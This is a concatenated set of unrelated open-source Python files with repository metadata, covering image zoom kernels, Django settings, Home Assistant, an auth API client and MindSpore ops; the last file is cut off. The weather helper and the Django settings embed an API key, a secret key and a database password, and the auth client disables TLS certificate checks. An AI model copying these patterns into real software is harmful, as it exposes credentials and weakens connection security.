acdf8a6033754a727dcc799205f59faf393b07cd | 443 | py | Python | leonardo_form_pegastudio/migrations/0003_auto_20180204_1538.py | dresl/leonardo-form-pegastudio | 915d6328a8ceef2217c896e3c3f0257092f08a16 | [
"BSD-3-Clause"
] | null | null | null | leonardo_form_pegastudio/migrations/0003_auto_20180204_1538.py | dresl/leonardo-form-pegastudio | 915d6328a8ceef2217c896e3c3f0257092f08a16 | [
"BSD-3-Clause"
] | null | null | null | leonardo_form_pegastudio/migrations/0003_auto_20180204_1538.py | dresl/leonardo-form-pegastudio | 915d6328a8ceef2217c896e3c3f0257092f08a16 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('leonardo_form_pegastudio', '0002_auto_20180204_1457'),
]
operations = [
migrations.AlterField(
model_name='pegastudioproducts',
name='document',
field=models.FileField(upload_to=b'documents/'),
),
]
| 22.15 | 64 | 0.634312 |
acdf8aad927262e88be2f68a3ea9b9a8c2559465 | 9,397 | py | Python | python/cucim/src/cucim/core/operations/intensity/zoom.py | aasthajh/cucim | a95cc5c4ab25beffeac42d642dea8cb1bbf21408 | [
"Apache-2.0"
] | 131 | 2021-04-09T19:02:10.000Z | 2022-03-25T08:49:11.000Z | python/cucim/src/cucim/core/operations/intensity/zoom.py | aasthajh/cucim | a95cc5c4ab25beffeac42d642dea8cb1bbf21408 | [
"Apache-2.0"
] | 222 | 2021-04-12T07:15:14.000Z | 2022-03-31T20:01:01.000Z | python/cucim/src/cucim/core/operations/intensity/zoom.py | aasthajh/cucim | a95cc5c4ab25beffeac42d642dea8cb1bbf21408 | [
"Apache-2.0"
] | 34 | 2021-04-09T18:54:13.000Z | 2022-03-29T12:59:26.000Z | # Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import math
from typing import Any, Sequence, Union
import cupy
import numpy as np
from .kernel.cuda_kernel_source import cuda_kernel_code
_logger = logging.getLogger("zoom_cucim")
CUDA_KERNELS = cupy.RawModule(code=cuda_kernel_code)
def zoom(
img: Any,
zoom_factor: Sequence[float]
):
"""Zooms an ND image
Parameters
----------
img : channel first, cupy.ndarray or numpy.ndarray
Input data of shape (C, H, W). Can also batch process input of shape
(N, C, H, W). Can be a numpy.ndarray or cupy.ndarray.
zoom_factor: Sequence[float]
The zoom factor along the spatial axes.
Zoom factor should contain one value for each spatial axis.
Returns
-------
out : cupy.ndarray or numpy.ndarray
Output data. Same dimensions and type as input.
Raises
------
TypeError
If input 'img' is not cupy.ndarray or numpy.ndarray
Examples
--------
>>> import cucim.core.operations.intensity as its
>>> # input is channel first 3d array
>>> output_array = its.zoom(input_arr,[1.1,1.1])
"""
try:
to_cupy = False
if isinstance(img, np.ndarray):
to_cupy = True
cupy_img = cupy.asarray(img, dtype=cupy.float32, order="C")
elif not isinstance(img, cupy.ndarray):
raise TypeError("img must be a cupy.ndarray or numpy.ndarray")
else:
cupy_img = cupy.ascontiguousarray(img)
if cupy_img.dtype != cupy.float32:
if cupy.can_cast(img.dtype, cupy.float32) is False:
raise ValueError(
"Cannot safely cast type {cupy_img.dtype.name} \
to 'float32'"
)
else:
cupy_img = cupy_img.astype(cupy.float32)
if img.ndim not in (3, 4):
raise ValueError(
f"Unsupported img.ndim={img.ndim}. Expected `img` with "
"dimensions (C, H, W) or (N, C, H, W)."
)
if len(img.shape) == 4:
N, C, H, W = img.shape
elif len(img.shape) == 3:
C, H, W = img.shape
N = 1
output_size_cu = [N, C, int(math.floor(H * zoom_factor[0])),
int(math.floor(W * zoom_factor[1]))]
if output_size_cu[2] == H and output_size_cu[3] == W:
return img
def get_block_size(output_size_cu, H, W):
max_smem = 48 * 1024
cu_block_options = [(16, 16, 1), (16, 8, 1), (8, 8, 1), (8, 4, 1)]
# compare for 48KB for standard CC optimal occupancy
# array is H, W but kernel is x--> W, y-->H
for param in cu_block_options:
h_stretch = [math.floor((0 * H) / output_size_cu[2]),
math.ceil((param[1] * H) / output_size_cu[2])]
w_stretch = [math.floor((0 * W) / output_size_cu[3]),
math.ceil((param[0] * W) / output_size_cu[3])]
smem_size = (h_stretch[1] + 1) * (w_stretch[1] + 1) * 4
if smem_size < max_smem:
return param, smem_size
raise Exception("Random Zoom couldnt find a \
shared memory configuration")
# input pitch
pitch = H * W
# get block size
block_config, smem_size = get_block_size(output_size_cu, H, W)
grid = (int((output_size_cu[3] - 1) / block_config[0] + 1),
int((output_size_cu[2] - 1) / block_config[1] + 1), C * N)
is_zoom_out = output_size_cu[2] < H and output_size_cu[3] < W
is_zoom_in = output_size_cu[2] > H and output_size_cu[3] > W
pad_dims = [[0, 0]] * 2 # zoom out
slice_dims = [[0, 0]] * 2 # zoom in
for idx, (orig, zoom) in enumerate(zip((H, W),
(output_size_cu[2],
output_size_cu[3]))):
diff = orig - zoom
half = abs(diff) // 2
if diff > 0:
pad_dims[idx] = [half, diff - half]
elif diff < 0:
slice_dims[idx] = [half, half + orig]
result = cupy.ndarray(cupy_img.shape, dtype=cupy.float32)
if is_zoom_in:
# slice
kernel = CUDA_KERNELS.get_function("zoom_in_kernel")
kernel(grid, block_config,
args=(cupy_img, result, np.int32(H), np.int32(W),
np.int32(output_size_cu[2]),
np.int32(output_size_cu[3]),
np.int32(pitch), np.int32(slice_dims[0][0]),
np.int32(slice_dims[0][1]),
np.int32(slice_dims[1][0]),
np.int32(slice_dims[1][1])),
shared_mem=smem_size)
elif is_zoom_out:
# pad
kernel = CUDA_KERNELS.get_function("zoom_out_kernel")
kernel(grid, block_config,
args=(cupy_img, result, np.int32(H), np.int32(W),
np.int32(output_size_cu[2]),
np.int32(output_size_cu[3]),
np.int32(pitch), np.int32(pad_dims[0][0]),
np.int32(pad_dims[0][1]),
np.int32(pad_dims[1][0]),
np.int32(pad_dims[1][1])),
shared_mem=smem_size)
# padding kernel
kernel = CUDA_KERNELS.get_function("zoomout_edge_pad")
grid = (int((W - 1) / block_config[0] + 1),
int((H - 1) / block_config[1] + 1),
C * N)
kernel(grid, block_config,
args=(result, np.int32(H), np.int32(W), np.int32(pitch),
np.int32(pad_dims[0][0]), np.int32(pad_dims[1][0]),
np.int32(pad_dims[0][0] + output_size_cu[2]),
np.int32(pad_dims[1][0] + output_size_cu[3])))
else:
raise Exception("Can only handle simultaneous \
expansion(or shrinkage) in both H,W dimension, \
check zoom factors")
if img.dtype != np.float32:
result = result.astype(img.dtype)
if to_cupy is True:
result = cupy.asnumpy(result)
return result
except Exception as e:
_logger.error("[cucim] " + str(e), exc_info=True)
_logger.info("Error executing random zoom on GPU")
raise
def rand_zoom(
img: Any,
min_zoom: Union[Sequence[float], float] = 0.9,
max_zoom: Union[Sequence[float], float] = 1.1,
prob: float = 0.1
):
"""
Randomly Calls zoom with random zoom factor
Parameters
----------
img : channel first, cupy.ndarray or numpy.ndarray
Input data of shape (C, H, W). Can also batch process input of shape
(N, C, H, W). Can be a numpy.ndarray or cupy.ndarray.
min_zoom: Min zoom factor. Can be float or sequence same size as image.
If a float, select a random factor from `[min_zoom, max_zoom]` then
apply to all spatial dims to keep the original spatial shape ratio.
If a sequence, min_zoom should contain one value for each spatial axis.
If 2 values provided for 3D data, use the first value for both H & W
dims to keep the same zoom ratio.
max_zoom: Max zoom factor. Can be float or sequence same size as image.
If a float, select a random factor from `[min_zoom, max_zoom]` then
apply to all spatial dims to keep the original spatial shape ratio.
If a sequence, max_zoom should contain one value for each spatial axis.
If 2 values provided for 3D data, use the first value for both H & W
dims to keep the same zoom ratio.
prob: Probability of zooming.
Returns
-------
out : cupy.ndarray or numpy.ndarray
Output data. Same dimensions and type as input.
Raises
------
TypeError
If input 'img' is not cupy.ndarray or numpy.ndarray
Examples
--------
>>> import cucim.core.operations.intensity as its
>>> # input is channel first 3d array
>>> output_array = its.rand_zoom(input_arr)
"""
R = np.random.RandomState()
rand_factor = R.rand()
zoom_factor = []
if rand_factor < prob:
try:
zoom_factor = [R.uniform(low, high)
for low, high in zip(min_zoom, max_zoom)]
except Exception:
zoom_factor = [R.uniform(min_zoom, max_zoom)]
if len(zoom_factor) != 2:
zoom_factor = [zoom_factor[0] for _ in range(2)]
if rand_factor < prob:
return zoom(img, zoom_factor)
else:
return img
| 36.707031 | 79 | 0.552836 |
acdf8bc13e7271df2e72e13e3e0c682b5c3d7eca | 520 | py | Python | RASA_assistant/actions/weather.py | PoCInnovation/Elivia-AI | fb632ee2309bb7a682e495da589e6443488e15cf | [
"MIT"
] | 1 | 2021-12-28T14:33:22.000Z | 2021-12-28T14:33:22.000Z | RASA_assistant/actions/weather.py | PoCInnovation/Elivia-AI | fb632ee2309bb7a682e495da589e6443488e15cf | [
"MIT"
] | null | null | null | RASA_assistant/actions/weather.py | PoCInnovation/Elivia-AI | fb632ee2309bb7a682e495da589e6443488e15cf | [
"MIT"
] | null | null | null | import requests
def get_weather(city):
api_address = 'http://api.openweathermap.org/data/2.5/weather?appid=0c42f7f6b53b244c78a418f4f181282a&q='
url = api_address + city
json_data = requests.get(url).json()
format_add = json_data['main']
print(format_add)
print("Weather is {0} Temperature is mininum {1} Celcius and maximum is {2} Celcius".format(
json_data['weather'][0]['main'], int(format_add['temp_min'] - 273), int(format_add['temp_max'] - 272)))
return format_add
| 40 | 112 | 0.682692 |
acdf8bd3113aa2e95f909896fddd15d80087e30a | 3,435 | py | Python | jobsearch/jobsearch/settings.py | shamsher4499/Job_website | cb76162db6f179dd5caf2abfdc63bbd6989e92c2 | [
"MIT"
] | null | null | null | jobsearch/jobsearch/settings.py | shamsher4499/Job_website | cb76162db6f179dd5caf2abfdc63bbd6989e92c2 | [
"MIT"
] | null | null | null | jobsearch/jobsearch/settings.py | shamsher4499/Job_website | cb76162db6f179dd5caf2abfdc63bbd6989e92c2 | [
"MIT"
] | null | null | null | """
Django settings for jobsearch project.
Generated by 'django-admin startproject' using Django 3.1.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'kbmu^2zxted6@ee$ki2wf$)$(qln2dh+m)nb()tjiaj+7cyfz5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'core',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'jobsearch.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR, 'templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'jobsearch.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.postgresql_psycopg2',
# 'NAME': 'shamsher',
# 'USER': 'postgres',
# 'PASSWORD': '12345',
# 'HOST': 'localhost',
# }
# }
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = BASE_DIR, 'static'
MEDIA_ROOT = BASE_DIR / 'media'
MEDIA_URL = '/media/' | 24.190141 | 91 | 0.680058 |
acdf8c045a1a6dc90ba23f17c311885771003932 | 3,788 | py | Python | homeassistant/components/upb/__init__.py | learn-home-automation/core | c5d8792c3487e9b418b1e7d623bf59e7dbddd6b7 | [
"Apache-2.0"
] | 22,481 | 2020-03-02T13:09:59.000Z | 2022-03-31T23:34:28.000Z | homeassistant/components/upb/__init__.py | learn-home-automation/core | c5d8792c3487e9b418b1e7d623bf59e7dbddd6b7 | [
"Apache-2.0"
] | 31,101 | 2020-03-02T13:00:16.000Z | 2022-03-31T23:57:36.000Z | homeassistant/components/upb/__init__.py | learn-home-automation/core | c5d8792c3487e9b418b1e7d623bf59e7dbddd6b7 | [
"Apache-2.0"
] | 11,411 | 2020-03-02T14:19:20.000Z | 2022-03-31T22:46:07.000Z | """Support the UPB PIM."""
import upb_lib
from homeassistant.const import ATTR_COMMAND, CONF_FILE_PATH, CONF_HOST, Platform
from homeassistant.core import callback
from homeassistant.helpers.entity import DeviceInfo, Entity
from .const import (
ATTR_ADDRESS,
ATTR_BRIGHTNESS_PCT,
ATTR_RATE,
DOMAIN,
EVENT_UPB_SCENE_CHANGED,
)
PLATFORMS = [Platform.LIGHT, Platform.SCENE]
async def async_setup_entry(hass, config_entry):
"""Set up a new config_entry for UPB PIM."""
url = config_entry.data[CONF_HOST]
file = config_entry.data[CONF_FILE_PATH]
upb = upb_lib.UpbPim({"url": url, "UPStartExportFile": file})
upb.connect()
hass.data.setdefault(DOMAIN, {})
hass.data[DOMAIN][config_entry.entry_id] = {"upb": upb}
hass.config_entries.async_setup_platforms(config_entry, PLATFORMS)
def _element_changed(element, changeset):
if (change := changeset.get("last_change")) is None:
return
if change.get("command") is None:
return
hass.bus.async_fire(
EVENT_UPB_SCENE_CHANGED,
{
ATTR_COMMAND: change["command"],
ATTR_ADDRESS: element.addr.index,
ATTR_BRIGHTNESS_PCT: change.get("level", -1),
ATTR_RATE: change.get("rate", -1),
},
)
for link in upb.links:
element = upb.links[link]
element.add_callback(_element_changed)
return True
async def async_unload_entry(hass, config_entry):
"""Unload the config_entry."""
unload_ok = await hass.config_entries.async_unload_platforms(
config_entry, PLATFORMS
)
if unload_ok:
upb = hass.data[DOMAIN][config_entry.entry_id]["upb"]
upb.disconnect()
hass.data[DOMAIN].pop(config_entry.entry_id)
return unload_ok
class UpbEntity(Entity):
"""Base class for all UPB entities."""
def __init__(self, element, unique_id, upb):
"""Initialize the base of all UPB devices."""
self._upb = upb
self._element = element
element_type = "link" if element.addr.is_link else "device"
self._unique_id = f"{unique_id}_{element_type}_{element.addr}"
@property
def name(self):
"""Name of the element."""
return self._element.name
@property
def unique_id(self):
"""Return unique id of the element."""
return self._unique_id
@property
def should_poll(self) -> bool:
"""Don't poll this device."""
return False
@property
def extra_state_attributes(self):
"""Return the default attributes of the element."""
return self._element.as_dict()
@property
def available(self):
"""Is the entity available to be updated."""
return self._upb.is_connected()
def _element_changed(self, element, changeset):
pass
@callback
def _element_callback(self, element, changeset):
"""Handle callback from an UPB element that has changed."""
self._element_changed(element, changeset)
self.async_write_ha_state()
async def async_added_to_hass(self):
"""Register callback for UPB changes and update entity state."""
self._element.add_callback(self._element_callback)
self._element_callback(self._element, {})
class UpbAttachedEntity(UpbEntity):
"""Base class for UPB attached entities."""
@property
def device_info(self) -> DeviceInfo:
"""Device info for the entity."""
return DeviceInfo(
identifiers={(DOMAIN, self._element.index)},
manufacturer=self._element.manufacturer,
model=self._element.product,
name=self._element.name,
sw_version=self._element.version,
)
| 28.916031 | 81 | 0.645459 |
acdf8d9123120aff40012f0ad7c99a9d26806dc9 | 7,055 | py | Python | test/auth.py | mahidharc/iudx-auth-server | 343ce3ad4d3345adc72967689b028a8996363b5a | [
"MIT"
] | null | null | null | test/auth.py | mahidharc/iudx-auth-server | 343ce3ad4d3345adc72967689b028a8996363b5a | [
"MIT"
] | null | null | null | test/auth.py | mahidharc/iudx-auth-server | 343ce3ad4d3345adc72967689b028a8996363b5a | [
"MIT"
] | null | null | null | # vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
import os
import sys
import json
import requests
class Auth():
#{
def __init__(self, certificate, key, auth_server="auth.iudx.org.in", version=1):
#
# Since we are testing on localhost
self.ssl_verify = False
self.url = "https://" + auth_server
self.credentials = (certificate, key)
#
def call(self, api, body=None, method = "POST", params=None, header={}):
#
ret = True # success
api_type = "/auth"
body = json.dumps(body)
url = self.url + api_type + "/v1/" + api
response = requests.request (
method = method,
url = url,
verify = self.ssl_verify,
cert = self.credentials,
data = body,
params = params,
headers = {"content-type":"application/json", **header}
)
if response.status_code != 200:
#
if "EXPECT_FAILURE" not in os.environ:
#
sys.stderr.write (
"WARNING: auth API failure | " +
url + " | " +
response.reason + " | " +
response.text
)
#
ret = False
#
if response.headers['content-type'] == 'application/json':
#
return {
"success" : ret,
"response" : json.loads(response.text),
"status_code" : response.status_code
}
#
else:
#
if "EXPECT_FAILURE" not in os.environ:
#
sys.stderr.write (
"WARNING: auth did not send 'application/json' : " + url + "\n"
)
#
return {"success":ret, "response":None}
#
#
def certificate_info(self):
return self.call("certificate-info")
def get_token(self, request, token_time=None):
#
body = {'request': request}
if token_time:
body['token-time'] = token_time
return self.call("token", body)
#
def get_policy(self):
return self.call("acl")
def set_policy(self, policy):
body = {'policy': policy}
return self.call("acl/set", body)
def revert_policy(self):
return self.call("acl/revert")
def append_policy(self, policy):
body = {'policy': policy}
return self.call("acl/append", body)
def introspect_token(self, token, server_token=None, request=None):
#
body = {'token': token}
if server_token:
body['server-token'] = server_token
if request:
if type(request) is type([]):
body['request'] = request
else:
body['request'] = [request]
return self.call("token/introspect", body)
#
def revoke_tokens(self, tokens):
#
if type(tokens) is type([]):
body = {'tokens': tokens}
else:
body = {'tokens': [tokens]}
return self.call("token/revoke", body)
#
def revoke_token_hashes(self, token_hashes):
#
if type(token_hashes) is type([]):
body = {'token-hashes': token_hashes}
else:
body = {'token-hashes': [token_hashes]}
return self.call("token/revoke", body)
#
def revoke_all(self, cert_serial, cert_fingerprint):
body = {'serial' : cert_serial, 'fingerprint' : cert_fingerprint}
return self.call("token/revoke-all", body)
def audit_tokens(self, hours):
body = {'hours': hours}
return self.call("audit/tokens", body)
def add_consumer_to_group(self, consumer, group, valid_till):
body = {'consumer': consumer, 'group': group, 'valid-till' : valid_till}
return self.call("group/add", body)
def delete_consumer_from_group(self, consumer, group):
body = {'consumer': consumer, 'group': group}
return self.call("group/delete", body)
def list_group(self, consumer, group=None):
#
body = {'consumer': consumer}
if group:
body['group'] = group
return self.call("group/list", body)
#
def provider_access(self, request, provider_email=None):
#
header = {}
if provider_email:
header['provider-email'] = provider_email
return self.call("provider/access", request, "POST", {}, header)
#
def delete_rule(self, request, provider_email=None):
#
header = {}
if provider_email:
header['provider-email'] = provider_email
return self.call("provider/access", request, "DELETE", {}, header)
#
def get_provider_access(self, provider_email=None):
#
header = {}
if provider_email:
header['provider-email'] = provider_email
return self.call("provider/access", {}, "GET", {}, header)
#
def organization_reg(self, org):
#
body = {'organization' : org}
return self.call("admin/organizations", body)
#
def get_provider_regs(self, filtr=None):
#
params = {"filter" : filtr}
return self.call("admin/provider/registrations", {}, "GET", params)
#
def update_provider_status(self, uid, status):
#
params = {"user_id" : uid, "status" : status}
return self.call("admin/provider/registrations/status", {}, "PUT", params)
#
def get_delegate_providers(self):
#
return self.call("delegate/providers", {}, "GET")
#
#}
| 32.813953 | 104 | 0.428774 |
acdf8ebede86d5d74a571b3df4acda04b7f60341 | 1,117 | py | Python | open_in_colab_workflow/glob_links.py | fem-on-colab/open-in-colab-workflow | d5309ff527cbea8a536a8890c88a8cc39bdb8b3c | [
"MIT"
] | null | null | null | open_in_colab_workflow/glob_links.py | fem-on-colab/open-in-colab-workflow | d5309ff527cbea8a536a8890c88a8cc39bdb8b3c | [
"MIT"
] | null | null | null | open_in_colab_workflow/glob_links.py | fem-on-colab/open-in-colab-workflow | d5309ff527cbea8a536a8890c88a8cc39bdb8b3c | [
"MIT"
] | null | null | null | # Copyright (C) 2021-2022 by the FEM on Colab authors
#
# This file is part of FEM on Colab-related actions.
#
# SPDX-License-Identifier: MIT
"""Get links associated to every notebook in the work directory."""
import os
import typing
from open_in_colab_workflow.glob_files import glob_files
from open_in_colab_workflow.publish_on import PublishOnArtifact, PublishOnBaseClass, PublishOnDrive, PublishOnGitHub
def glob_links(work_dir: str, pattern: str, publish_on: PublishOnBaseClass) -> typing.Dict[str, typing.Optional[str]]:
"""Get links associated to every notebook matching a pattern in the work directory."""
if isinstance(publish_on, PublishOnArtifact):
# No link replacement is necessary
return {}
elif isinstance(publish_on, (PublishOnDrive, PublishOnGitHub)):
links_replacement = dict()
for local_file in glob_files(work_dir, pattern):
links_replacement[local_file] = publish_on.get_url(os.path.relpath(local_file, work_dir))
return links_replacement
else: # pragma: no cover
raise RuntimeError("Invalid publish_on attribute")
| 41.37037 | 118 | 0.749329 |
acdf8f4be86e11c777a760f3a7f649ac9e02d1fc | 428 | py | Python | setup.py | rubenhenares/qss-debugger | bef7659ad687ad07aa14734d416040bf6d72a0f3 | [
"Apache-2.0"
] | 1 | 2019-03-22T16:27:46.000Z | 2019-03-22T16:27:46.000Z | setup.py | rubenhenares/qss-debugger | bef7659ad687ad07aa14734d416040bf6d72a0f3 | [
"Apache-2.0"
] | null | null | null | setup.py | rubenhenares/qss-debugger | bef7659ad687ad07aa14734d416040bf6d72a0f3 | [
"Apache-2.0"
] | 1 | 2020-12-13T00:23:19.000Z | 2020-12-13T00:23:19.000Z | from setuptools import setup
setup(
name='qss_debugger',
version='0.1.5',
packages=['qss_debugger'],
install_requires=['future', 'Qt.py'],
url='https://github.com/rubenhenares/qss_debugger',
license='Apache License 2.0',
author='Ruben Henares',
author_email='ruben@404fs.com',
description='Improves the process of styling Qt applications with qss.',
keywords=['qt', 'styling', 'qss']
)
| 26.75 | 76 | 0.670561 |
acdf8f872303f5a5aa5a115c55fe36e8a3ff52b8 | 2,122 | py | Python | test/vanilla/Expected/AcceptanceTests/Xml/xmlservice/_configuration.py | Azure/autorest.azure-functions-python | b0896d8aec6b0fd6f0bcb12ea8e0489652dc2783 | [
"MIT"
] | 4 | 2020-10-22T20:35:38.000Z | 2021-12-21T07:29:01.000Z | test/vanilla/Expected/AcceptanceTests/Xml/xmlservice/_configuration.py | Azure/autorest.azure-functions-python | b0896d8aec6b0fd6f0bcb12ea8e0489652dc2783 | [
"MIT"
] | 3 | 2020-09-09T15:16:15.000Z | 2021-12-20T15:25:18.000Z | test/vanilla/Expected/AcceptanceTests/Xml/xmlservice/_configuration.py | Azure/autorest.azure-functions-python | b0896d8aec6b0fd6f0bcb12ea8e0489652dc2783 | [
"MIT"
] | 2 | 2020-11-10T07:16:23.000Z | 2020-12-30T11:03:14.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
from azure.core.configuration import Configuration
from azure.core.pipeline import policies
from ._version import VERSION
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any
class AutoRestSwaggerBATXMLServiceConfiguration(Configuration):
"""Configuration for AutoRestSwaggerBATXMLService.
Note that all parameters used to create this instance are saved as instance
attributes.
"""
def __init__(
self,
**kwargs # type: Any
):
# type: (...) -> None
super(AutoRestSwaggerBATXMLServiceConfiguration, self).__init__(**kwargs)
kwargs.setdefault('sdk_moniker', 'autorestswaggerbatxmlservice/{}'.format(VERSION))
self._configure(**kwargs)
def _configure(
self,
**kwargs # type: Any
):
# type: (...) -> None
self.user_agent_policy = kwargs.get('user_agent_policy') or policies.UserAgentPolicy(**kwargs)
self.headers_policy = kwargs.get('headers_policy') or policies.HeadersPolicy(**kwargs)
self.proxy_policy = kwargs.get('proxy_policy') or policies.ProxyPolicy(**kwargs)
self.logging_policy = kwargs.get('logging_policy') or policies.NetworkTraceLoggingPolicy(**kwargs)
self.retry_policy = kwargs.get('retry_policy') or policies.RetryPolicy(**kwargs)
self.custom_hook_policy = kwargs.get('custom_hook_policy') or policies.CustomHookPolicy(**kwargs)
self.redirect_policy = kwargs.get('redirect_policy') or policies.RedirectPolicy(**kwargs)
self.authentication_policy = kwargs.get('authentication_policy')
| 41.607843 | 106 | 0.671065 |
acdf8fc843b536931739bc551f00e5745e8f9fed | 256 | py | Python | 96-Unique-Binary-Search-Trees/solution.py | alfmunny/leetcode | e35d2164c7e6e66410309fe1667ceab5a7689bef | [
"MIT"
] | null | null | null | 96-Unique-Binary-Search-Trees/solution.py | alfmunny/leetcode | e35d2164c7e6e66410309fe1667ceab5a7689bef | [
"MIT"
] | null | null | null | 96-Unique-Binary-Search-Trees/solution.py | alfmunny/leetcode | e35d2164c7e6e66410309fe1667ceab5a7689bef | [
"MIT"
] | null | null | null | class Solution:
def numTrees(self, n):
if n < 1:
return 0
dp = [0] * (n+1)
dp[0] = 1
for i in range(1, n+1):
for j in range(0, i):
dp[i] += dp[j]*dp[i-1-j]
return dp[n]
| 18.285714 | 40 | 0.375 |
acdf8ff54847236cdf82d91e6a66144a68acc433 | 6,899 | py | Python | mindspore/ops/operations/control_ops.py | dongkcs/mindspore | cd7df6dbf463ff3128e9181e9d0c779cecb81320 | [
"Apache-2.0"
] | 2 | 2020-11-23T13:46:37.000Z | 2020-12-20T02:02:38.000Z | mindspore/ops/operations/control_ops.py | dongkcs/mindspore | cd7df6dbf463ff3128e9181e9d0c779cecb81320 | [
"Apache-2.0"
] | null | null | null | mindspore/ops/operations/control_ops.py | dongkcs/mindspore | cd7df6dbf463ff3128e9181e9d0c779cecb81320 | [
"Apache-2.0"
] | 1 | 2021-01-01T08:35:01.000Z | 2021-01-01T08:35:01.000Z | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""control_ops"""
from ...common import dtype as mstype
from ..._checkparam import Validator as validator
from ..._checkparam import Rel
from ..primitive import Primitive, PrimitiveWithInfer, prim_attr_register
class ControlDepend(Primitive):
"""
Adds control dependency relation between source and destination operation.
In many cases, we need to control the execution order of operations. ControlDepend is designed for this.
ControlDepend will instruct the execution engine to run the operations in a specific order. ControlDepend
tells the engine that the destination operations must depend on the source operation which means the source
operations must be executed before the destination.
Note:
This operation does not work in `PYNATIVE_MODE`.
Args:
depend_mode (int): Use 0 for a normal dependency relation. Use 1 to depends on operations which using Parameter
as its input. Default: 0.
Inputs:
- **src** (Any) - The source input. It can be a tuple of operations output or a single operation output. We do
not concern about the input data, but concern about the operation that generates the input data.
If `depend_mode` is 1 and the source input is Parameter, we will try to find the operations that
used the parameter as input.
- **dst** (Any) - The destination input. It can be a tuple of operations output or a single operation output.
We do not concern about the input data, but concern about the operation that generates the input data.
If `depend_mode` is 1 and the source input is Parameter, we will try to find the operations that
used the parameter as input.
Outputs:
Bool. This operation has no actual data output, it will be used to setup the order of relative operations.
Examples:
>>> class Net(nn.Cell):
>>> def __init__(self):
>>> super(Net, self).__init__()
>>> self.control_depend = P.ControlDepend()
>>> self.softmax = P.Softmax()
>>>
>>> def construct(self, x, y):
>>> mul = x * y
>>> softmax = self.softmax(x)
>>> ret = self.control_depend(mul, softmax)
>>> return ret
>>> x = Tensor(np.ones([4, 5]), dtype=mindspore.float32)
>>> y = Tensor(np.ones([4, 5]), dtype=mindspore.float32)
>>> net = Net()
>>> output = net(x, y)
"""
@prim_attr_register
def __init__(self, depend_mode=0):
"""init"""
validator.check_int_range(depend_mode, 0, 1, Rel.INC_BOTH, "depend_mode", self.name)
def __call__(self, src, dst):
return src
class GeSwitch(PrimitiveWithInfer):
"""
Adds control switch to data.
Switch data flows into false or true branch depending on the condition. If the condition is true,
the true branch will be activated, or vise verse.
Inputs:
- **data** (Union[Tensor, Number]) - The data to be used for switch control.
- **pred** (Tensor) - It must be a scalar whose type is bool and shape is `()`, It is used as condition for
switch control.
Outputs:
tuple. Output is tuple(false_output, true_output). The Elements in the tuple has the same shape of input data.
The false_output connects with the false_branch and the true_output connects with the true_branch.
Examples:
